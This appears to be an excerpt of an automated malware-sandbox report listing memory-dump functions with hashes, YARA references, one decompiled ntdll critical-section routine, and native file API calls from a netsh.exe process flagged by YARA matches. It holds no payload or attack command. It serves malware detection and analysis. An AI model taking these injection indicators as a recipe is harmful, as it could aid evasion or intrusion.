Opcode ID: 2a0e446e9f8b1e96992bcb71c7b2e40bca0bd34e1ee0880bbeb4d91463c567fc
Instruction ID: 66271256e09ee43e8c71260758e7fb10574fb5ba6ece4070bbd1ec5332a0d80f
Opcode Fuzzy Hash: 2a0e446e9f8b1e96992bcb71c7b2e40bca0bd34e1ee0880bbeb4d91463c567fc
Instruction Fuzzy Hash: F590027130181402D10065994C097470009A7D0352F61C011E9154655EC6A5C8917971

Uniqueness

Uniqueness Score: -1.00%

Function 01619A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181db97665a4a8cd1699787e688cc7819887fe5fd7a025837ed0a78659ad622a
Instruction ID: 53fade720c81d103af00333e7c765b5d8d5180976e98f5ddc8139aa4d7de9ebb
Opcode Fuzzy Hash: 181db97665a4a8cd1699787e688cc7819887fe5fd7a025837ed0a78659ad622a
Instruction Fuzzy Hash: 4890026130185442D14066994C05B0F4109A7E1252FA1C019E8146654CC95588556B61

Uniqueness

Uniqueness Score: -1.00%

Function 01619560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed3f7535f2cc39a208bf382e7a9604337f1476638dcd3e391de7b2141ae90b7
Instruction ID: fc122a227b94dda142b82ce5ba33b8f37f192b9a64fa15c5db012954e86d283d
Opcode Fuzzy Hash: 5ed3f7535f2cc39a208bf382e7a9604337f1476638dcd3e391de7b2141ae90b7
Instruction Fuzzy Hash: 5B900265321410020145A9990A0550B0449B7D63A13A1C015F5406690CC66188656761

Uniqueness

Uniqueness Score: -1.00%

Function 01619520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca2f1dd70d5afdf547af180b02c68e24aa9550456f0e5de747cfdfcdaa59e6c4
Instruction ID: 342147a37e070b9f466d2db3ba72a5b19dafd46ea5a81024d405e7475ad8b689
Opcode Fuzzy Hash: ca2f1dd70d5afdf547af180b02c68e24aa9550456f0e5de747cfdfcdaa59e6c4
Instruction Fuzzy Hash: 0F9002E1301550924500A6998805B0B4509A7E0251B61C016E5044660CC5658851A575

Uniqueness

Uniqueness Score: -1.00%

Function 0161AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ed3b62ec195a03def4da8842e8028fbf94133af217202b4032f18bb3946edc
Instruction ID: fb763764a76331a9be925b9bf8d0ecface14b95d6882e9a4da7d66d115ac1fdd
Opcode Fuzzy Hash: 52ed3b62ec195a03def4da8842e8028fbf94133af217202b4032f18bb3946edc
Instruction Fuzzy Hash: 27900271B0541012914075994C15647400AB7E0791B65C011E4504654CC9948A5567E1

Uniqueness

Uniqueness Score: -1.00%

Function 016195F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd547f6c5ee5aaccfd98b8c9ac4afe23f10f22b79b3c62063495e35e74bdec4b
Instruction ID: 92b623691dbed5bd9f4354fa5dd91b7207379cb8aaaeee8bc54d449817167067
Opcode Fuzzy Hash: bd547f6c5ee5aaccfd98b8c9ac4afe23f10f22b79b3c62063495e35e74bdec4b
Instruction Fuzzy Hash: 7C90027130141802D10465994C056870009A7D0351F61C011EA014755ED6A588917571

Uniqueness

Uniqueness Score: -1.00%

Function 01619760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5412d736d5cde7254c52421376af20fc77006cb272d522b50f0624d573f97d6
Instruction ID: 9c6101706bc15a88e967ba63ef25acf3f7b84297bbe87bacf9e1ef1ad8266b98
Opcode Fuzzy Hash: f5412d736d5cde7254c52421376af20fc77006cb272d522b50f0624d573f97d6
Instruction Fuzzy Hash: 1490027130141403D100659959097070009A7D0251F61D411E4414658DD69688517561

Uniqueness

Uniqueness Score: -1.00%

Function 01619770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a755450f509120491287a71fdae3a73c3b7ddc2526db38efd3812d3193f3f7d
Instruction ID: 2c621d404440274ef5f7561478cec81728eedb124dfdac613c03993edc76d70e
Opcode Fuzzy Hash: 0a755450f509120491287a71fdae3a73c3b7ddc2526db38efd3812d3193f3f7d
Instruction Fuzzy Hash: 4590026130545442D10069995809A070009A7D0255F61D011E5054695DC6758851B571

Uniqueness

Uniqueness Score: -1.00%

Function 0161A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d116050788060ce733debcaabf5813cca5c3febea9cb1029735103d47022dfb
Instruction ID: 067ced237e1fcf377069f8917e3c657909459872062775ea9b774291719c228f
Opcode Fuzzy Hash: 0d116050788060ce733debcaabf5813cca5c3febea9cb1029735103d47022dfb
Instruction Fuzzy Hash: 0190027530545442D50069995C05A870009A7D0355F61D411E441469CDC6948861B561

Uniqueness

Uniqueness Score: -1.00%

Function 01619730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13dd37e1f88beb14f4c44824847d167f101732c0e2bb7aa27042ffcf23c7b3cf
Instruction ID: 54265d18c8b93a63c9f32c64530a3ec335a6010dcafbf81cd223a87aeb96d575
Opcode Fuzzy Hash: 13dd37e1f88beb14f4c44824847d167f101732c0e2bb7aa27042ffcf23c7b3cf
Instruction Fuzzy Hash: 4890026170541402D140759958197070019A7D0251F61D011E4014654DC6998A557AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0161A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ceb98fde77ca607cc26f0b3c420d32e0516ed2f09364f4933adce824bea1c9c
Instruction ID: 0ea322bb86c33385a2f128a5cb29a5607acf3100193132b2171f952e6d3d49fd
Opcode Fuzzy Hash: 8ceb98fde77ca607cc26f0b3c420d32e0516ed2f09364f4933adce824bea1c9c
Instruction Fuzzy Hash: CB900271301410529500AAD95C05A4B4109A7F0351B61D015E8004654CC59488616561

Uniqueness

Uniqueness Score: -1.00%

Function 01619650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432178b08fef60e2bfe2d666bb6c0fde5213c78690eca2f6c7969fefc728c218
Instruction ID: 3919702dc79012b0d3909648b33b8937262af33d07f8cb93b80173d3b4ce7e5a
Opcode Fuzzy Hash: 432178b08fef60e2bfe2d666bb6c0fde5213c78690eca2f6c7969fefc728c218
Instruction Fuzzy Hash: 3B90027130545842D14075994805A470019A7D0355F61C011E4054794DD6658D55BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 01619610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5169158532cd06ed6ed9542c9137c49c5d65670f39f7dd87e3002d5daaab1e2
Instruction ID: a5f9c096f605ce68b09b24766e973ea56e2c51099a4c09131c016fbbf637b033
Opcode Fuzzy Hash: f5169158532cd06ed6ed9542c9137c49c5d65670f39f7dd87e3002d5daaab1e2
Instruction Fuzzy Hash: A690027170541802D150759948157470009A7D0351F61C011E4014754DC7958A557AE1

Uniqueness

Uniqueness Score: -1.00%

Function 016196D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b02f22b0ba6fe549e57460890749fd3d9f0f3b711e7bd31107f50e164a4bc50
Instruction ID: 18fe18f1f5c9464844787e23fad378fdfc828b1ce4c67cfa3eee95dbba1cd309
Opcode Fuzzy Hash: 3b02f22b0ba6fe549e57460890749fd3d9f0f3b711e7bd31107f50e164a4bc50
Instruction Fuzzy Hash: A790027130141842D10065994805B470009A7E0351F61C016E4114754DC655C8517961

Uniqueness

Uniqueness Score: -1.00%

Function 01619670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: a7d6ed56437cb92c43c3f4e2ff1015abbb96a24e925bd073b567eb30a7c17746
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0166FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0166FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0161CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01665720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01665720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0166fdda
0x0166fde2
0x0166fde5
0x0166fdec
0x0166fdfa
0x0166fdff
0x0166fe0a
0x0166fe0f
0x0166fe17
0x0166fe1e
0x0166fe19
0x0166fe19
0x0166fe19
0x0166fe20
0x0166fe21
0x0166fe22
0x0166fe25
0x0166fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0166FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0166FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0166FE01

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: a817d47b70bb8b15cdbffbf5e5e8a90a899dee31e463a75283b2f6452487adb3
Instruction ID: 2e3ec4db7711015e6602df52e7fca9c6e89a578a00b0091ec021b279de405d57
Opcode Fuzzy Hash: a817d47b70bb8b15cdbffbf5e5e8a90a899dee31e463a75283b2f6452487adb3
Instruction Fuzzy Hash: 38F0F632240602BFE6201A85DC02F33BF5FEB44B70F140318F6285A5D1DA62F83086F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: netsh.exe PID: 6376 Parent PID: 3440 netsh.exeCOMMON

Executed Functions

Function 031481BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03143B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03143B97,007A002E,00000000,00000060,00000000,00000000), ref: 0314820D

Strings

.z`, xrefs: 031481FD, 03148208

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 412f2a80fcf0e0491a6d38b9e093f1a7824fb145d4e0d5e26539f61452fb4ba5
Instruction ID: dd7b0ef5e93de5b57cf1c8d68ccef0866be65aff7b90c22713e0c1426e649a93
Opcode Fuzzy Hash: 412f2a80fcf0e0491a6d38b9e093f1a7824fb145d4e0d5e26539f61452fb4ba5
Instruction Fuzzy Hash: 5601B6B6215108AFCB08DF99DC94EEB77ADAF8C754F158248FA1D97290C630E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 031481C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03143B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03143B97,007A002E,00000000,00000060,00000000,00000000), ref: 0314820D

Strings

.z`, xrefs: 031481FD, 03148208

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 8d52d71a4fa29232fad95f84cd31d3a16d20c0e145d3ec906ae7294ffac32468
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 1EF0B2B2201208ABCB08DF88DC84EEB77ADAF8C754F158248FA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0314826A, Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03143D52,5E972F59,FFFFFFFF,03143A11,?,?,03143D52,?,03143A11,FFFFFFFF,5E972F59,03143D52,?,00000000), ref: 031482B5

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 478615e95ace36f3cd8b7b944c21b069e38cd5bb92e988d30f7af8276b961ba5
Instruction ID: a0a278533e26013203c658a76792f3ea4ea00854ec18fe82c31c5741f3f53299
Opcode Fuzzy Hash: 478615e95ace36f3cd8b7b944c21b069e38cd5bb92e988d30f7af8276b961ba5
Instruction Fuzzy Hash: 27F0EC72200109AFCB14DF89DC80EEB77ADEF8C754F158649FA1DA7241D631E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03148270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03143D52,5E972F59,FFFFFFFF,03143A11,?,?,03143D52,?,03143A11,FFFFFFFF,5E972F59,03143D52,?,00000000), ref: 031482B5

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: c6b7a6e457979602e46390297b94d582568f5757c143a832b67834b01ee0be82
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 1AF0A4B6200208ABCB14DF89DC80EEB77ADAF8C754F158648BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 031482EA, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03143D30,?,?,03143D30,00000000,FFFFFFFF), ref: 03148315

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e643648313c1e3c6a37ea52fa1624ecfef819cb225245136967a35d0cf984082
Instruction ID: 9ea50951f924f71ff7c8e3b3d7055c6fa9ce00e679dbe3491a2b4e560467a80f
Opcode Fuzzy Hash: e643648313c1e3c6a37ea52fa1624ecfef819cb225245136967a35d0cf984082
Instruction Fuzzy Hash: E7E0C2766002007BDB20EFF4CC85FEB7B28EF48260F254498F94C9B242C931E900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 031482F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03143D30,?,?,03143D30,00000000,FFFFFFFF), ref: 03148315

Memory Dump Source

Source File: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 2a713b2f9bf04d384d6fdca8bf1f1019ee6569b85368874c3a3d499b85e4e860
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 12D01776200314ABD710EF98CC85EA77BACEF48660F154499BA189B242CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 037B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B9A5A

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f065b2ffb53ee85ba162b7c7a5220f5b8469e62a23134a021d734ac3b0b8cb9d
Instruction ID: d10ffaee5dd273bd49fcfe4d198355afd5355faa88569f9c921f62551014a802
Opcode Fuzzy Hash: f065b2ffb53ee85ba162b7c7a5220f5b8469e62a23134a021d734ac3b0b8cb9d
Instruction Fuzzy Hash: 7890026122188446E320A5694C14B07004597D4343F51C13DA0144594CCA558C617561

Uniqueness

Uniqueness Score: -1.00%

Function 037B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B991A

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a1b4a7c69a4756a8942eb9f115613f6ce0e02dc7252bcb963b147e725a12b8f6
Instruction ID: fb5d6a731551c435bb51df63a2f42e3c601ec562896686a22a2769c2ac2b18c0
Opcode Fuzzy Hash: a1b4a7c69a4756a8942eb9f115613f6ce0e02dc7252bcb963b147e725a12b8f6
Instruction Fuzzy Hash: 8C9002B121108806E260B1594404746004597D4341F51C039A5054594E87998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 037B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B99AA

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c34bb96236d61b93080b608b186a1a875da02b51987faa48e27b0b47c97619e8
Instruction ID: 39a6a08c4e1d09c0a0725f312367930541fd8f6f80f66e659f351bb03b0fbdd8
Opcode Fuzzy Hash: c34bb96236d61b93080b608b186a1a875da02b51987faa48e27b0b47c97619e8
Instruction Fuzzy Hash: 8B9002A135108846E220A1594414B060045D7E5341F51C03DE1054594D8759CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 037B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B986A

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ebe40245b52dcf49d5e6a25bdde6838218fe06c4ecedab0df5867ed9c2fdf420
Instruction ID: f8db7af0a3d8e9eb05f48469552f6c30a9aca30ecf9bb480bb49f23b208072d5
Opcode Fuzzy Hash: ebe40245b52dcf49d5e6a25bdde6838218fe06c4ecedab0df5867ed9c2fdf420
Instruction Fuzzy Hash: E990027121108817E231A1594504707004997D4381F91C43AA0414598D97968D52B161

Uniqueness

Uniqueness Score: -1.00%

Function 037B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B984A

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de67f686cd6fff217e284453fba49424ef2289d38d0a9cb4aae65ba24cc4f0c8
Instruction ID: e6f30cb715864dbd24a31418f81fbfca56424e251fb2aa0ec89ce10377ec94e4
Opcode Fuzzy Hash: de67f686cd6fff217e284453fba49424ef2289d38d0a9cb4aae65ba24cc4f0c8
Instruction Fuzzy Hash: 109002612520C5566665F15944045074046A7E4381791C03AA1404990C86669C56F661

Uniqueness

Uniqueness Score: -1.00%

Function 037B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B971A

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d87665facb4c05e6c8579f597296a54b2b2900121c8e905970298475ab9c53fa
Instruction ID: f24e849b485f0fe39c49825a34fd90410f9b2cfa1ae5be9f4aaadd7f02647310
Opcode Fuzzy Hash: d87665facb4c05e6c8579f597296a54b2b2900121c8e905970298475ab9c53fa
Instruction Fuzzy Hash: ED90027121108806E220A5995408646004597E4341F51D039A5014595EC7A58C917171

Uniqueness

Uniqueness Score: -1.00%

Function 037B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B9FEA

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0236ee1b387c8c147619d4d49583e2a32679f30e1a6374ddfcdf6bae01543d9
Instruction ID: 1146fe2603ea035b6b0dbffb988884f84ea3141ade23f7295ca024b186ef429d
Opcode Fuzzy Hash: e0236ee1b387c8c147619d4d49583e2a32679f30e1a6374ddfcdf6bae01543d9
Instruction Fuzzy Hash: 129002713211C806E230A1598404706004597D5341F51C439A0814598D87D58C917162

Uniqueness

Uniqueness Score: -1.00%

Function 037B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B978A

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bee62d3f6cf41e5ce903f6b86db85d84d9e7fd4178e9b8ca0c7f4188110edb0
Instruction ID: 53f2a6164537e66df0f77e3baeb01fa8acfac7d714d1dedbd883f5b084920572
Opcode Fuzzy Hash: 9bee62d3f6cf41e5ce903f6b86db85d84d9e7fd4178e9b8ca0c7f4188110edb0
Instruction Fuzzy Hash: 5A90026922308406E2A0B159540860A004597D5342F91D43DA0005598CCA558C697361

Uniqueness

Uniqueness Score: -1.00%

Function 037B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B96EA

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5c58f9258df8fa8d6ee732ba0adb438b5c43d90734b58098a57e0c30ca6d6d71
Instruction ID: 63253493a2e669a4d7a8900c09b08a7d784aa8c23a434bdac1dbc9f939f0c578
Opcode Fuzzy Hash: 5c58f9258df8fa8d6ee732ba0adb438b5c43d90734b58098a57e0c30ca6d6d71
Instruction Fuzzy Hash: D19002712110CC06E230A159840474A004597D4341F55C439A4414698D87D58C917161

Uniqueness

Uniqueness Score: -1.00%

Function 037B96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B96DA

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0d3a6f924435fec0ac67e57a99bc88af7b00d96a54adddf67e81fbb8d12fb601
Instruction ID: accb844f8639eced468f367a1d77a7c91f6d57af36c59002b2cbdee3835d71c9
Opcode Fuzzy Hash: 0d3a6f924435fec0ac67e57a99bc88af7b00d96a54adddf67e81fbb8d12fb601
Instruction Fuzzy Hash: 7190027121108C46E220A1594404B46004597E4341F51C03EA0114694D8755CC517561

Uniqueness

Uniqueness Score: -1.00%

Function 037B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B954A

Memory Dump Source

Source File: 0000000A.00000002.585684006.0000000003750000.00000040.00000001.sdmp, Offset: 03750000, based on PE: true

Associated: 0000000A.00000002.585949243.000000000386B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.585958864.000000000386F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1230c0a80aa6fcc2234d09f5b86e7cb04887c4b7685ee21e41ef494e6e9d7c9b
Instruction ID: 2bfd9c305b0eefd47db970c695668aa9dc8acafc94eddf79160e7db1779ac79e
Opcode Fuzzy Hash: 1230c0a80aa6fcc2234d09f5b86e7cb04887c4b7685ee21e41ef494e6e9d7c9b
Instruction Fuzzy Hash: 25900265221084071225E5590704507008697D9391351C039F1005590CD7618C617161

Uniqueness

Uniqueness Score: -1.00%

Function 037B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037B95DA

Memory Dump Source

